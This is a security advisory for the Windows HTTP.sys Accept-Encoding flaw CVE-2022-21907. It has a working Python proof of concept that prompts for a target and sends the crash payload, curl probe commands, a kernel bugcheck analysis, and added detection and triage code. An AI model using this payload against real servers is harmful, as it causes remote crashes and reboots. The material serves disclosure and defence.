PACKETSTORM:165566 (nu11secur1ty), published Jan 17, 2022

HTTP Protocol Stack Denial Of Service / Remote Code Execution

2022-01-17 00:00:00
nu11secur1ty
packetstormsecurity.com

CVSS 3.1: 9.8 High

- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: NONE
- Scope: UNCHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: HIGH
- Availability Impact: HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907
#
# Sends a single GET whose Accept-Encoding header lists several unknown
# content-codings followed by "*" and two empty elements.  On an unpatched
# Windows 10 version 2004 host the HTTP.sys header parser bugchecks and the
# machine reboots, so no normal HTTP reply comes back.

from colorama import init, Fore, Style
init(convert=True)  # translate ANSI colour codes on a Windows console
import requests
import time

print(Fore.RED + "Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE + "Sending an especially malicious crafted packet, please wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)  The header value is one string; the pieces below are joined
# by Python's implicit string-literal concatenation.
payload = (
    'AAAAAAAAAAAAAAAAAAAAAAAA,'
    'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,'
    'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,'
    'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,'
    'OOOAOAOOOAOOAOOOAOOOAOOOAOO,'
    '****************************stupiD, *, ,'
)
try:
    # A target that bugchecks never answers; bound the wait instead of hanging.
    poc = requests.get(f'http://{host}/', headers={'Accept-Encoding': payload}, timeout=10)
    # Not necessary :)
    print(poc, "\n")
except requests.exceptions.RequestException as exc:
    print(f"No HTTP reply ({type(exc).__name__}); the target may have crashed.")
print(Style.RESET_ALL)
```

---- Original Advisory ----
  
## Title: HTTP.sys buffer overflow denial of service  
## Author: nu11secur1ty  
## Date: 01.12.2022  
## Vendor: https://docs.microsoft.com/  
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0  
## CVE-2022-21907  
  
## Description:  
NOTE: After a couple of hours of tests with the IIS packages installed, no crash could be produced on Windows Server 2019 or Windows 10 version 1809 (the 2018 release); those builds are patched or not vulnerable by default. On Windows 10 version 2004 (the 2020 release) the HTTP Protocol Stack (HTTP.sys) can be crashed by a single request: the kernel bugchecks and the system restarts (denial of service).
The attacker sends a maliciously crafted Accept-Encoding header to any HTTP.sys listener on the system; the header value is not parsed correctly, and the result is critical for that system.
The bugcheck below shows what actually fails: a corrupted LIST_ENTRY (fast-fail code 3, "double remove") in HTTP!UlFreeUnknownCodingList, reached from HTTP!UlpParseAcceptEncoding, i.e. a list-handling error rather than a classic buffer overflow. The "overrun of a stack-based buffer" text in the !analyze output is the generic description Windows prints for every fast-fail bugcheck (status 0xc0000409) and should not be read literally.
Microsoft's advisory for CVE-2022-21907 rates the flaw as remote code execution (the 9.8 CVSS score on this page reflects that) and states that Windows Server 2019 and Windows 10 version 1809 are not affected unless HTTP Trailer Support has been enabled through the EnableTrailerSupport registry value under HKLM\SYSTEM\CurrentControlSet\Services\HTTP\Parameters. What this advisory demonstrates is the denial of service.
Status: CRITICAL
  
## Simple connection test before debugging

A harmless Accept-Encoding value with three unknown codings is answered normally (an IIS 404 page, because the requested path does not exist), which confirms that HTTP.sys is listening and parsing the header before the crash payload is sent.
  
```cmd  
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"  
```  
  
- Output:  
  
```cmd  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>  
<title>404 - File or directory not found.</title>  
<style type="text/css">  
<!--  
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,  
sans-serif;background:#EEEEEE;}  
fieldset{padding:0 15px 10px 15px;}  
h1{font-size:2.4em;margin:0;color:#FFF;}  
h2{font-size:1.7em;margin:0;color:#CC0000;}  
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}  
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px  
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;  
background-color:#555555;}  
#content{margin:0 0 0 2%;position:relative;}  
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}  
-->  
</style>  
</head>  
<body>  
<div id="header"><h1>Server Error</h1></div>  
<div id="content">  
<div class="content-container"><fieldset>  
<h2>404 - File or directory not found.</h2>  
<h3>The resource you are looking for might have been removed, had  
its name changed, or is temporarily unavailable.</h3>  
</fieldset></div>  
</div>  
</body>  
</html>  
```  
## 302  
  
```cmd  
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"  
```  
- Output:  
  
  The same IIS "404 - File or directory not found." page as for /201 above; HTTP.sys answers normally.
  
## 404  
  
```cmd  
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"  
```  
  
- Output:  
  
  The same IIS "404 - File or directory not found." page as for /201 above; HTTP.sys answers normally.
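
The following Python is an added example, not part of the original advisory or the author's PoC. It shows what a detection for this request pattern looks like: each element of an Accept-Encoding value is checked against the RFC 7231 grammar (a token, optionally followed by a q parameter), codings that HTTP.sys/IIS do not know are counted, and a request is flagged when it carries many unknown codings or malformed (empty) elements. The crash payload is mostly syntactically valid tokens, so the signal is the count of unknown codings and the trailing empty elements, not bad characters. The thresholds are assumptions, and the sample requests are constructed here (the benign probe and the payload are taken from this page).

```python
"""Flag Accept-Encoding headers shaped like the CVE-2022-21907 payload.

Added example, not from the original advisory.  Thresholds and the sample
requests are constructed for illustration.
"""
import re
from typing import Dict, List

# RFC 7230 tchar: characters a content-coding name may contain.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# RFC 7231 qvalue: 0 to 1 with at most three decimals.
QVALUE_RE = re.compile(r"^(?:0(?:\.[0-9]{0,3})?|1(?:\.0{0,3})?)$")
# Codings an HTTP.sys/IIS host recognises (plus the wildcard); anything
# else goes onto the parser's "unknown coding" list.
KNOWN_CODINGS = {"gzip", "x-gzip", "deflate", "br", "identity", "compress", "x-compress", "*"}

# Illustrative thresholds (assumptions; tune per environment).
MAX_UNKNOWN_CODINGS = 3
MAX_HEADER_LENGTH = 256

ACCEPT_ENCODING_RE = re.compile(r"^Accept-Encoding:[ \t]*(.*?)[ \t\r]*$", re.IGNORECASE | re.MULTILINE)


def parse_accept_encoding(value: str) -> List[Dict]:
    """Split a header value into elements and validate each one."""
    elements = []
    for raw in value.split(","):
        element = raw.strip()
        if not element:
            elements.append({"coding": "", "q": None, "valid": False, "reason": "empty element"})
            continue
        name, _, params = element.partition(";")
        name = name.strip()
        q = None
        valid = bool(TOKEN_RE.match(name))
        reason = None if valid else "non-token characters in coding"
        if params:
            match = re.match(r"^[ \t]*q[ \t]*=[ \t]*(\S+)[ \t]*$", params, re.IGNORECASE)
            if match and QVALUE_RE.match(match.group(1)):
                q = float(match.group(1))
            else:
                valid, reason = False, "bad parameter"
        elements.append({"coding": name, "q": q, "valid": valid, "reason": reason})
    return elements


def assess_accept_encoding(value: str) -> Dict:
    """Score one header value; 'reasons' is empty for benign values."""
    elements = parse_accept_encoding(value)
    unknown = [e["coding"] for e in elements if e["valid"] and e["coding"].lower() not in KNOWN_CODINGS]
    malformed = [e["reason"] for e in elements if not e["valid"]]
    reasons = []
    if len(unknown) > MAX_UNKNOWN_CODINGS:
        reasons.append(f"{len(unknown)} unknown codings")
    if malformed:
        reasons.append(f"{len(malformed)} malformed elements")
    if len(value) > MAX_HEADER_LENGTH:
        reasons.append(f"header length {len(value)}")
    return {"suspicious": bool(reasons), "reasons": reasons, "unknown": unknown, "malformed": malformed}


def scan_raw_request(raw: str) -> Dict:
    """Locate the Accept-Encoding header in a raw HTTP/1.1 request and assess it."""
    match = ACCEPT_ENCODING_RE.search(raw)
    if not match:
        return {"suspicious": False, "reasons": [], "unknown": [], "malformed": []}
    return assess_accept_encoding(match.group(1))


# Constructed samples: a browser request, the advisory's probe, and its payload.
POC_HEADER = (
    "AAAAAAAAAAAAAAAAAAAAAAAA,"
    "BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,"
    "RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,"
    "TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,"
    "OOOAOAOOOAOOAOOOAOOOAOOOAOO,"
    "****************************stupiD, *, ,"
)
SAMPLE_REQUESTS = {
    "browser": "GET / HTTP/1.1\r\nHost: 192.168.1.8\r\nAccept-Encoding: gzip, deflate, br\r\n\r\n",
    "probe": "GET /201 HTTP/1.1\r\nHost: 192.168.1.8\r\nAccept-Encoding: pwn, pwned, package\r\n\r\n",
    "poc": f"GET / HTTP/1.1\r\nHost: 192.168.1.8\r\nAccept-Encoding: {POC_HEADER}\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_REQUESTS.items():
        print(name, scan_raw_request(raw))
```

IIS's default W3C log fields do not record Accept-Encoding, so this has to run where the raw header is visible: a reverse proxy or WAF in front of the host, a packet capture, or IIS with the header added as a custom logging field. The probe value ("pwn, pwned, package") stays under the unknown-coding threshold on purpose, matching the advisory's observation that it is answered normally.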
  
## Bugcheck:  
  
```cmd  
1: kd> kp  
Child-SP RetAddr Call Site  
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx  
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69  
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0  
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323  
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63  
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5  
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51  
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218  
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7  
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff  
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa  
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112  
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55  
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28  
1: kd> !analyze  
*******************************************************************************  
* *  
* Bugcheck Analysis *  
* *  
*******************************************************************************  
  
KERNEL_SECURITY_CHECK_FAILURE (139)  
A kernel component has corrupted a critical data structure. The corruption  
could potentially allow a malicious user to gain control of this machine.  
Arguments:  
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).  
Arg2: ffffa10287993480, Address of the trap frame for the exception  
that caused the bugcheck  
Arg3: ffffa102879933d8, Address of the exception record for the  
exception that caused the bugcheck  
Arg4: 0000000000000000, Reserved  
  
Debugging Details:  
------------------  
  
*** WARNING: Unable to verify timestamp for win32k.sys  
  
BUGCHECK_CODE: 139  
  
BUGCHECK_P1: 3  
  
BUGCHECK_P2: ffffa10287993480  
  
BUGCHECK_P3: ffffa102879933d8  
  
BUGCHECK_P4: 0  
  
PROCESS_NAME: System  
  
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of  
a stack-based buffer in this application. This overrun could  
potentially allow a malicious user to gain control of this  
application.  
  
SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63  
  
MODULE_NAME: HTTP  
  
IMAGE_NAME: HTTP.sys  
  
FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList  
  
FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}  
  
Followup: MachineOwner  
---------  
```  
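
As an added example (not the advisory author's code), the following Python turns a WinDbg transcript like the one above into a triage record: it pulls the BUGCHECK_* fields out of the !analyze output, decodes the __fastfail subcode carried in P1 for KERNEL_SECURITY_CHECK_FAILURE (0x139), and walks the `kp` stack to the first frame outside the kernel image, which is the component that tripped the check. The embedded transcript is copied from the Bugcheck section above; the FAST_FAIL table is the subset of the winnt.h codes needed here.

```python
"""Triage a WinDbg bugcheck transcript (added example, not from the advisory)."""
import re
from typing import Dict, List, Optional

# __fastfail codes reported as P1 of bugcheck 0x139 (winnt.h FAST_FAIL_*).
FAST_FAIL_CODES = {
    0: "FAST_FAIL_LEGACY_GS_VIOLATION",
    1: "FAST_FAIL_VTGUARD_CHECK_FAILURE",
    2: "FAST_FAIL_STACK_COOKIE_CHECK_FAILURE",
    3: "FAST_FAIL_CORRUPT_LIST_ENTRY",
    4: "FAST_FAIL_INCORRECT_STACK",
    5: "FAST_FAIL_INVALID_ARG",
    6: "FAST_FAIL_GS_COOKIE_INIT",
    7: "FAST_FAIL_FATAL_APP_EXIT",
}

# One `kp` frame: Child-SP and RetAddr as xxxxxxxx`xxxxxxxx, then the call site.
FRAME_RE = re.compile(r"^\s*[0-9a-f]{8}`[0-9a-f]{8}\s+[0-9a-f]{8}`[0-9a-f]{8}\s+(\S+)\s*$", re.I)
FIELD_RE = re.compile(
    r"^\s*(BUGCHECK_CODE|BUGCHECK_P[1-4]|PROCESS_NAME|SYMBOL_NAME|MODULE_NAME|IMAGE_NAME|FAILURE_BUCKET_ID):\s*(\S+)",
    re.M,
)


def parse_frame(site: str) -> Dict:
    """'HTTP!UlFreeUnknownCodingList+0x63' -> module, function, offset."""
    module, _, rest = site.partition("!")
    function, _, offset = rest.partition("+")
    return {"module": module, "function": function, "offset": int(offset, 16) if offset else 0}


def parse_stack(text: str) -> List[Dict]:
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            frames.append(parse_frame(m.group(1)))
    return frames


def parse_fields(text: str) -> Dict[str, str]:
    return dict(FIELD_RE.findall(text))


def triage(text: str) -> Dict:
    fields = parse_fields(text)
    stack = parse_stack(text)
    code = int(fields.get("BUGCHECK_CODE", "0"), 16)
    p1 = int(fields.get("BUGCHECK_P1", "0"), 16)
    # First frame not in the kernel image itself: the component that tripped the check.
    culprit: Optional[Dict] = next((f for f in stack if f["module"].lower() != "nt"), None)
    return {
        "bugcheck": code,
        # 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN) is printed for every fast-fail;
        # P1 is what actually says which consistency check failed.
        "fast_fail": FAST_FAIL_CODES.get(p1) if code == 0x139 else None,
        "module": culprit["module"] if culprit else None,
        "function": culprit["function"] if culprit else None,
        "accept_encoding_path": any(f["function"] == "UlpParseAcceptEncoding" for f in stack),
        "frames": len(stack),
        "bucket": fields.get("FAILURE_BUCKET_ID"),
    }


# Transcript copied from the advisory's Bugcheck section (kp stack plus the key fields).
TRANSCRIPT = """\
1: kd> kp
Child-SP RetAddr Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
KERNEL_SECURITY_CHECK_FAILURE (139)
BUGCHECK_CODE: 139
BUGCHECK_P1: 3
BUGCHECK_P2: ffffa10287993480
BUGCHECK_P3: ffffa102879933d8
BUGCHECK_P4: 0
PROCESS_NAME: System
SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63
MODULE_NAME: HTTP
IMAGE_NAME: HTTP.sys
FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList
"""

if __name__ == "__main__":
    print(triage(TRANSCRIPT))
```

When reading dumps like this one, keep in mind that the 0xc0000409 "stack-based buffer" text appears for every __fastfail and says nothing about the actual failure; P1 = 3 identifies a LIST_ENTRY consistency check, and the frame directly below nt!KiRaiseSecurityCheckFailure names the code that hit it.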
  
## Reproduce:
[nu11secur1ty/Windows10Exploits on GitHub (2022/CVE-2022-21907)](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)

## Proof and Exploit:
[Video demonstration (streamable)](https://streamable.com/fbojva)
  